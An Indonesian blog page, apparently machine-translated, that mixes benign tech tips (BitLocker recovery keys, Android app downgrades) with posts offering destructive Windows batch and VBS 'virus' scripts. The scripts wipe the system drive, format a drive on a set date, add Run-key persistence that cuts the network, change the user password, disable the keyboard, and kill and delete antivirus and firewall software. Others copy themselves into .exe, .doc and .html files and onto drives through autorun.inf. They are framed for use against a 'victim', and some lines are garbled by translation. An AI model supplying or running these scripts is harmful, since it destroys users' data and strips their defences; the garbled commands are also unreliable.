IMP. Catatan >> Saya tidak bertanggung jawab atas kerusakan atau kesalahan pelaporan di komputer Anda yang melakukannya sebagai risiko Anda sendiri. Pengodean ini hanya untuk konsep pengetahuan.

Semua Skrip Di Sini Akan Disalin Dalam Note Pad

>> Virus Ini Menghapus Semua Konten Drive ...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Simpan Kode Di Atas dalam file .bat

>> Nonaktifkan Internet Secara Permanen
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE



>> Virus Paling Sederhana Untuk Menghancurkan Jendela
@Echo off
Del C:\ *.* |y

Save It As Anything.bat

>> Ini Akan Menghancurkan Komputer Anda
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next


Save It As Anything.vbs

Ini Hanya Bekerja Dengan Windows XP

>> Notes Tanpa Batas

* Ini akan memunculkan notes yang tidak berujung hingga komputer macet dan macet *

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bom Virus
Salin Tempel Yang Berikut
 
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


Dan Simpan Ini Sebagai Apa Pun

Catatan: - Anda Dapat Mengubah Tanggal (2009/11/25) Dari Virus Dan Lokasi (format E:) Yang Di Kerjanya
Virus Akan Berlaku Pada Hari Itu

>> Kunci topi gila

* Ini terus-menerus mengaktifkan dan menonaktifkan kunci caps sangat cepat terus menerus *

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>> Masuk Tanpa Batas

* Ini terus-menerus membuatnya sehingga tombol enter ditekan terus-menerus *

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>> Backspace Tanpa Akhir

* Ini membuatnya jadi tombol backspace terus ditekan *

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Apa jenis kelamin komputer Anda?

-> buka notepad
-> menyalin kode

CreateObject ("SAPI.SpVoice"). Bicaralah "I love YOU"

-> n tempel di Notepad
-> simpan sebagai> love.vbs
-> klik dua kali di atasnya

Jadikan Keyboard Anda Disco Light

Trik ini hanya membuat lampu keyboard Anda disko.
Script yang saya bagikan dengan Anda, ketika dieksekusi membuat flash light Caps, Num dan Scroll Lock Anda dengan cara berirama keren!

1. Bagian kode ini menjadikan keyboard Anda disko langsung ..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


2. Yang ini membuatnya tampak seperti rantai cahaya ....

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop


Instruksi:
* rekatkan salah satu dari dua kode di atas dalam notepad
* Simpan sebagai "AnyFileName" .vbs
* Jalankan file
* Untuk berhenti, buka task manager dan kemudian di bawah "Proses" dan "wscript.exe"

Saya harap kamu akan menyukainya .. 😉

>> Tugas Membunuh

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause


simpan ini sebagai file .bat dan kirim dan hancurkan korban & k! ll Operasikan! ng systeM!

>> Ketikkan kode di notepad
@echo off
shutdown -r -f -t 00

Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn

Menunjukkan durasi penundaan, dalam detik, sebelum melakukan tindakan.

-c “messagetext”

Menampilkan pesan di jendela System Shutdown. Maksimal 127 karakter dapat digunakan. Pesan harus dilampirkan dalam tanda kutip.

-f
Memaksa semua aplikasi yang berjalan untuk dimatikan.

-r
Reboot PC. .. !! ..!

>> Menggerakkan Drive CD

* Ini akan membuat CD drive terus-menerus keluar *

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


>> Untuk membuat bicara pc Anda

Buka file teks di notepad dan tulis:

Dim msg, sapi
msg=InputBox(“Enter your text”,”Talk it”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Simpan file dengan ekstensi (* .vbs), itu akan membuat File VBScript.
Ini akan meminta Anda untuk teks ketika Anda membuka file, memasukkan teks dan tekan ok. "

kamu akan mendengar sekarang apa yang kamu ketik ..

ini bekerja di xp, vista, win7 juga.

enjoy !!!

Wednesday, November 6, 2019

Cara Menghapus Kunci Enkripsi Disk Windows Anda Dari Server Microsoft

CMD
Windows memungkinkan enkripsi perangkat pada banyak PC Windows 10 dan 8.1. Itu juga mengunggah kunci pemulihan Anda ke server Microsoft, memungkinkan Anda untuk mendapatkan kembali akses ke drive terenkripsi Anda bahkan jika Anda lupa kata sandi mereka.

Namun, jika Anda tidak nyaman dengan ini, Anda dapat menghapus kunci pemulihan dari server Microsoft atau bahkan membuat kunci baru. Proses ini bahkan bekerja pada edisi Home Windows, meskipun mereka tidak memiliki akses ke enkripsi BitLocker lengkap yang disediakan oleh versi Profesional.

Anda Mungkin Seharusnya Tidak Melakukan Ini


Secara realistis, Anda mungkin tidak boleh melakukan ini. Tidak biasa bahwa Microsoft secara diam-diam mengunggah kunci pemulihan ke servernya sendiri, tetapi sebenarnya tidak lebih buruk daripada status quo sebelumnya. Versi Windows sebelumnya - dan banyak PC Windows saat ini yang masih belum dikirimkan dengan enkripsi perangkat diaktifkan - hanya tidak dienkripsi. Itu berarti siapa pun dapat mengakses file mereka jika mereka bisa mendapatkan komputer mereka. Mengaktifkan enkripsi dan memberikan Microsoft kunci pemulihan adalah bantuan besar terhadap pencuri laptop dan orang lain yang mungkin ingin mengintip file Anda.

Kunci pemulihan memungkinkan Anda mendapatkan kembali akses ke file komputer Anda meskipun Anda lupa kata sandi, atau memutakhirkan perangkat keras pada sistem Anda (yang terkadang dapat mengunci Anda dari drive yang dienkripsi). Anda cukup masuk ke akun Microsoft Anda secara online, menemukan kunci pemulihan, dan mengetiknya di komputer Anda untuk mengakses hard drive yang terkunci. Ini adalah keuntungan besar bagi pengguna rumahan yang tidak perlu membuat cadangan kunci pemulihan mereka di tempat yang aman, dan mungkin lupa kata sandi mereka. Pengguna rumahan tidak akan senang jika mereka kehilangan semua file di komputer mereka karena sesuatu yang konyol.

Tentu saja, sisi lain dari koin di sini adalah bahwa Microsoft dapat dipaksa untuk memberikan kunci pemulihan Anda kepada pemerintah. Atau, secara bergantian, seseorang dapat memperoleh akses fisik ke komputer Anda dan entah bagaimana masuk ke akun Microsoft Anda untuk mengakses kunci pemulihan dan memotong enkripsi. Kiat di bawah ini akan mengambil kunci pemulihan itu dari Microsoft. Tetapi jika Anda melakukan ini, Anda harus menyimpan salinannya sendiri dan menyimpannya di tempat yang aman . Jika hilang, dan Anda lupa kata sandi atau perbarui perangkat keras tanpa menonaktifkan enkripsi terlebih dahulu, Anda akan dikunci untuk selamanya.

Hapus Kunci Pemulihan Dari Server Microsoft


Untuk memeriksa apakah Microsoft menyimpan kunci pemulihan untuk satu atau lebih PC Anda, buka halaman https://onedrive.live.com/recoverykey di browser web Anda. Masuk dengan akun Microsoft yang sama dengan yang Anda masuk pertama kali pada PC Windows itu.

Jika Anda tidak memiliki kunci yang disimpan di server Microsoft, Anda akan melihat pesan "Anda tidak memiliki kunci pemulihan BitLocker di akun Microsoft Anda".

Jika Anda memiliki kunci pemulihan yang disimpan di server Microsoft, Anda akan melihat satu atau lebih kunci pemulihan di sini. Klik nama komputer Anda dan kemudian klik tautan "Hapus" yang muncul untuk menghapus kunci pemulihan Anda dari server Microsoft.

Peringatan : Catat kunci pemulihan ini atau cetak dan simpan di tempat yang aman sebelum menghapusnya! Anda akan memerlukan kunci pemulihan jika Anda perlu mendapatkan kembali akses ke file terenkripsi Anda. 


Hasilkan Kunci Pemulihan Baru


Microsoft berjanji mereka akan dengan cepat menghapus kunci pemulihan yang Anda hapus dari server mereka. Namun, jika Anda agak paranoid, ini mungkin tidak akan cukup baik untuk Anda. Sebagai gantinya, Anda dapat meminta Windows membuat kunci pemulihan baru yang tidak akan pernah diunggah ke server Microsoft.

Ini tidak perlu mengenkripsi ulang seluruh drive Anda. Pada dasarnya, enkripsi BitLocker menggunakan dua kunci. Kunci pertama disimpan hanya di komputer Anda dan digunakan untuk mengenkripsi dan mendekripsi file Anda. Kunci kedua digunakan untuk mendekripsi kunci yang tersimpan di komputer Anda. Proses ini hanya mengubah kunci kedua, yang merupakan satu-satunya yang pernah meninggalkan komputer Anda.

Untuk melakukan ini, klik kanan tombol Start dan pilih "Command Prompt (Admin)" untuk membuka jendela Prompt Perintah sebagai administrator.


Ketikkan perintah berikut dan tekan Enter untuk sementara "menangguhkan" perlindungan BitLocker:

manage-bde -protectors -disable% systemdrive%


Jalankan perintah berikut untuk menghapus kunci pemulihan saat ini

manage-bde -protectors -delete% systemdrive% -type RecoveryPassword 


Kemudian jalankan perintah ini untuk menghasilkan kunci pemulihan baru:

manage-bde -protectors -add% systemdrive% -RecoveryPassword

Penting : Tulis atau cetak kunci pemulihan yang ditampilkan setelah Anda menjalankan perintah ini dan simpan di tempat yang aman! Ini adalah kunci pemulihan baru Anda, dan Anda bertanggung jawab untuk menjaganya.


Terakhir, aktifkan kembali perlindungan BitLocker:

 manage-bde -protectors -ableable% systemdrive%


Anda akan melihat pesan yang mengatakan tidak ada drive di komputer yang mendukung enkripsi perangkat. Namun, mereka dienkripsi. Jika Anda ingin membatalkan semua perubahan, Anda harus menonaktifkan enkripsi di jendela command prompt.

Atau Cukup Gunakan BitLocker Sebagai Gantinya
Jika Anda memiliki edisi Professional Windows - atau jika Anda bersedia membayar $ 99 lagi untuk meningkatkan ke edisi Professional Windows - Anda dapat melewati semua ini dan hanya mengatur enkripsi BitLocker normal. Ketika Anda mengatur BitLocker, Anda akan ditanya bagaimana Anda ingin membuat cadangan kunci pemulihan Anda. Hanya saja, jangan pilih opsi "Simpan ke akun Microsoft Anda" dan Anda akan baik-baik saja. Pastikan untuk menuliskan kunci pemulihan atau mencetaknya dan menyimpannya di tempat yang aman!

Ini juga satu-satunya cara resmi untuk mengenkripsi drive sistem Windows Anda jika komputer Anda tidak dikirimkan dengan enkripsi perangkat diaktifkan. Anda tidak bisa hanya mengaktifkan enkripsi perangkat nanti - pada PC Windows Home tanpa enkripsi perangkat, Anda harus membayar untuk Windows Professional sehingga Anda dapat menggunakan BitLocker. Anda bisa mencoba menggunakan TrueCrypt atau alat open-source yang serupa, tetapi awan ketidakpastian masih menggantung di atasnya.


Sekali lagi, sebagian besar pengguna Windows tidak akan mau melakukan ini. Dengan enkripsi perangkat, Microsoft pindah dari semua PC Windows yang tidak dienkripsi secara default ke banyak PC Windows yang dienkripsi secara default. Meskipun Microsoft memiliki kunci pemulihan, itu adalah kemenangan besar untuk keamanan data dan peningkatan besar. Tetapi, jika Anda ingin melangkah lebih jauh, trik-trik di atas akan memungkinkan Anda mengambil kendali atas kunci pemulihan Anda tanpa membayar Windows edisi Professional.

Beberapa file .bat Paling BERBAHAYA


Beberapa kode ini sangat berbahaya!
GUNAKAN INI DI RISIKO ANDA SENDIRI.


Blokir Google.

Kode:
@echo off
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"
::---------------------------::

Blokir Hotmail.

Kode:
@echo off
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::

Blokir MSN.

Kode:
@echo off
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 http://www.msn.com >> "Hosts"
::---------------------------::

Blokir wikipedia.

Kode:
@echo off
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 http://www.wikipedia.org >> "Hosts"
::---------------------------::

Ubah waktu menjadi 00:00.

Kode:
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Ubah pass pengguna.

Kode:
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Buat akun MILIK.

Kode:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Hapus semua dokumen.

Kode:
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::

Hapus semua musik.

Kode:
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::

Hapus semua foto.

Kode:
@echo off
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::

Nonaktifkan Firewall.

Kode:
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

[color = # FF0000] Nonaktifkan Internet.
Kode:
@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::

Nonaktifkan Keyboard.

Kode:
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::

Menginfeksi semua Bat.

Kode:
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
) @echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Menginfeksi semua dokumen.

Kode:
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
) @echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Menginfeksi semua Driver.

Kode:

@echo off

:: —– Menginfeksi Semua Drive—– ::
untuk %% E In (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) Lakukan (
copy / Y% 0 %% E: \
echo [AutoRun]> %% E: \ autorun.inf
echo open = ”%% E: \% 0 ″ >> %% E: \ autorun.inf
echo action = Buka folder untuk melihat file ... >> %% E: \ autorun.inf)
:: ———————— ::

Menginfeksi semua file .exe.

Kode:
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
) @echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Buka disk.

Kode:
@echo off
::-------Open Disk Tray------::
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
::---------------------------::

Spam / Drive C.

Kode:
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::

Bunuh Anti-virus.

Kode:

@echo off

:: ——- AV Kill [UD] ——– ::
berhenti bersih "Pusat Keamanan"
set firewall netsh mode opmode = nonaktifkan
tskill / A av *
tskill / A fire *
tskill / A anti *
cls
tskill / Mata-mata *
tskill / A bullguard
tskill / A PersFw
tskill / A KAV *
tskill / A ZONEALARM
tskill / A SAFEWEB
cls
tskill / A OUTPOST
tskill / A nv *
tskill / A nav *
tskill / A F- *
tskill / A ESAFE
tskill / A cle
cls
tskill / A BLACKICE
tskill / A def *
tskill / A kav
tskill / A kav *
tskill / A rata-rata *
tskill / A ash *
cls
tskill / A aswupdsv
tskill / A ewid *
tskill / Seorang penjaga *
tskill / A guar *
tskill / A gcasDt *
tskill / A msmp *
cls
tskill / A mcafe *
tskill / A mghtml
tskill / A msiexec
tskill / A outpost
tskill / A aman
tskill / A zap *
cls
tskill / A zauinst
tskill / A upd *
tskill / A zlclien *
tskill / A minilog
tskill / A cc *
tskill / A norton *
cls
tskill / A norton au *
tskill / A ccc *
tskill / A npfmn *
tskill / A loge *
tskill / A nisum *
tskill / A issvc
tskill / A tmp *
cls
tskill / A tmn *
tskill / A pcc *
tskill / A cpd *
tskill / A pop *
tskill / A pav *
tskill / A padmin
cls
tskill / A panda *
tskill / A avsch *
tskill / A sche *
tskill / A syman *
tskill / A virus *
tskill / A realm *
cls
tskill / A sweep *
tskill / A scan *
tskill / A ad- *
tskill / Brankas *
tskill / A avas *
tskill / A norm *
cls
tskill / A offg *
del / Q / FC: \ Program Files \ alwils ~ 1 \ avast4 \ *. *
del / Q / FC: \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ *. exe
del / Q / FC: \ Program Files \ kasper ~ 1 \ * .exe
cls
del / Q / FC: \ Program Files \ trojan ~ 1 \ * .exe
del / Q / FC: \ Program Files \ f-prot95 \ *. dll
del / Q / FC: \ Program Files \ tbav \ * .dat
cls
del / Q / FC: \ Program Files \ avpersonal \ *. vdf
del / Q / FC: \ Program Files \ Norton ~ 1 \ *. cnt
del / Q / FC: \ Program Files \ Mcafee \ *. *
cls
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ *. *
del / Q / FC: \ Program Files \ Norton ~ 1 \ *. *
cls
del / Q / FC: \ Program Files \ avgamsr \ * .exe
del / Q / FC: \ Program Files \ avgamsvr \ * .exe
del / Q / FC: \ Program Files \ avgemc \ *. exe
cls
del / Q / FC: \ Program Files \ avgcc \ *. exe
del / Q / FC: \ Program Files \ avgupsvc \ *. exe
del / Q / FC: \ Program Files \ grisoft
del / Q / FC: \ Program Files \ nood32krn \ *. exe
del / Q / FC: \ Program Files \ nood32 \ * .exe
cls
del / Q / FC: \ Program Files \ nod32
del / Q / FC: \ Program Files \ nood32
del / Q / FC: \ Program Files \ kav \ * .exe
del / Q / FC: \ Program Files \ kavmm \ * .exe
del / Q / FC: \ Program Files \ kaspersky \ *. *
cls
del / Q / FC: \ Program Files \ ewidoctrl \ * .exe
del / Q / FC: \ Program Files \ guard \ * .exe
del / Q / FC: \ Program Files \ ewido \ *. exe
cls
del / Q / FC: \ Program Files \ pavprsrv \ * .exe
del / Q / FC: \ Program Files \ pavprot \ * .exe
del / Q / FC: \ Program Files \ avengine \ *. exe
cls
del / Q / FC: \ Program Files \ apvxdwin \ *. exe
del / Q / FC: \ Program Files \ webproxy \ * .exe
del / Q / FC: \ Program Files \ perangkat lunak panda \ *. *
:: ———————— ::

 Menginfeksi semua HTML.

Kode:
@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
) @echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
) Del / f / s / q DirPath
:: ———————— ::

Sembunyikan folder MUSIC.

Kode:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Lagu startup XP

Kode:
@echo off
::--Start Hidden WinXP Song--::
cd "C:\Windows\system32\oobe\images"
start title.wma
::---------------------------::

CMD terinfeksi.

Kode:
@echo off
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------::

Tuesday, November 5, 2019

Siapa pun dapat mengetahui kata sandi Anda dari metode ini.

Di halaman login situs web, Anda dapat melihat kata sandi yang di-mask (******) dengan mengubah jenis input kata sandi sebagai teks dari elemen inspeksi di browser Anda. Metode ini berfungsi di semua browser modern. Jangan pernah meninggalkan komputer Anda dengan halaman pendaftaran.

View-password-text-asterisk

Cara Menurunkan Aplikasi Android jika Anda Tidak menyukai Pembaruan

Semua Aplikasi Android mendapatkan pembaruan mereka, beberapa mungkin mendapatkan pembaruan segera dan beberapa mungkin mendapatkan pembaruan yang sangat jarang. Pembaruan ini dapat membuat perubahan unik baru atau hanya mengubah aplikasi yang ada yang telah Anda instal sebelumnya di perangkat Anda. Lihat metode untuk menurunkan versi aplikasi apa pun di Android Anda .

Kadang-kadang mungkin ada masalah yang dihadapi oleh pengguna di mana mereka menemukan aplikasi tidak berfungsi dengan benar atau menemukan beberapa kesalahan setelah upgrade dan ini bukan tidak mungkin sementara para pengembang tidak yakin tentang cara kerja yang sama dari aplikasi pada setiap perangkat. Sekarang, bagaimana jika Anda telah meningkatkan aplikasi dan kemudian setelah menggunakannya lagi Anda merasa aplikasi tersebut tidak berfungsi dengan benar dan mendapatkan beberapa kesalahan di dalamnya, hal negatif apa pun yang Anda dapatkan di aplikasi, Anda mungkin ingin menghapus aplikasi itu atau hanya menggunakannya sama. Tetapi ada sesuatu yang mungkin tidak terpikirkan oleh Anda, yaitu menurunkan versi aplikasi karena tidak ada opsi langsung untuk tindakan yang sama di Android. Namun terlepas dari itu, Anda sebenarnya dapat melakukannya dengan beberapa metode, dan di sini di artikel ini, metode tersebut dijelaskan dengan baik. Seperti beberapa waktu itu juga terjadi pada saya bahwa saya tidak suka antarmuka pengguna baru atau kadang-kadang fungsionalitas tambahan yang ditambahkan pengembang aplikasi jadi saya pergi untuk menurunkan versi aplikasi tersebut. Dan juga itulah satu-satunya alasan saya meneliti untuk itu dan menemukan cara di bawah ini yang dengannya saya dapat melakukan itu. Cukup baca artikel untuk informasi lebih lanjut tentang metode itu.

Untuk aplikasi sistem, mungkin ada satu-satunya pilihan untuk menurunkan versi aplikasi diperbarui dengan menghapus instalasi pembaruan aplikasi dari preferensi aplikasi. Untuk aplikasi pihak ketiga, Anda dapat melalui proses di bawah ini.

Langkah-langkah Untuk Menurunkan Versi Aplikasi Android jika Anda tidak menyukai Pembaruan:


1. Pertama-tama, buka pengaturan perangkat Android dan kemudian dari opsi matikan saja fitur Pembaruan Otomatis untuk aplikasi yang diinstal. Setelah itu, Anda juga harus memeriksa bahwa opsi untuk menginstal aplikasi dari sumber yang tidak dikenal juga diaktifkan karena Anda akan memerlukan fitur itu sesudahnya.




2. Sekarang periksa versi aplikasi yang lebih rendah yang ingin Anda turunkan di Android dan kemudian unduh dari web . Anda dapat dengan mudah menemukan versi aplikasi yang Anda inginkan untuk dijalankan di perangkat Anda. Setelah itu hapus instalan aplikasi yang diinstal pada Perangkat Anda.

3. Sekarang navigasikan ke folder pada manajer file Anda di mana Anda telah mengunduh versi yang diperlukan dari aplikasi yang sama yang Anda inginkan (versi yang diturunkan). Sekarang klik file apk untuk aplikasi itu dan itu akan mulai menginstal pada perangkat Anda. 




4. Setelah aplikasi berhasil diinstal dengan semua izin diterima, Anda sekarang dapat membuka aplikasi yang sama dari ikon yang dapat Anda lihat di dok Android Anda. Itu terlalu sederhana karena Anda terbiasa dengan itu!

5. Aplikasi yang akan Anda luncurkan tidak akan menjadi versi yang diperbarui tetapi akan menjadi versi yang diturunkan dari aplikasi. Ingatlah bahwa Anda tidak harus mengaktifkan fitur pembaruan aplikasi otomatis di perangkat Anda karena ini akan memperbarui lagi aplikasi yang tidak ingin Anda lakukan.

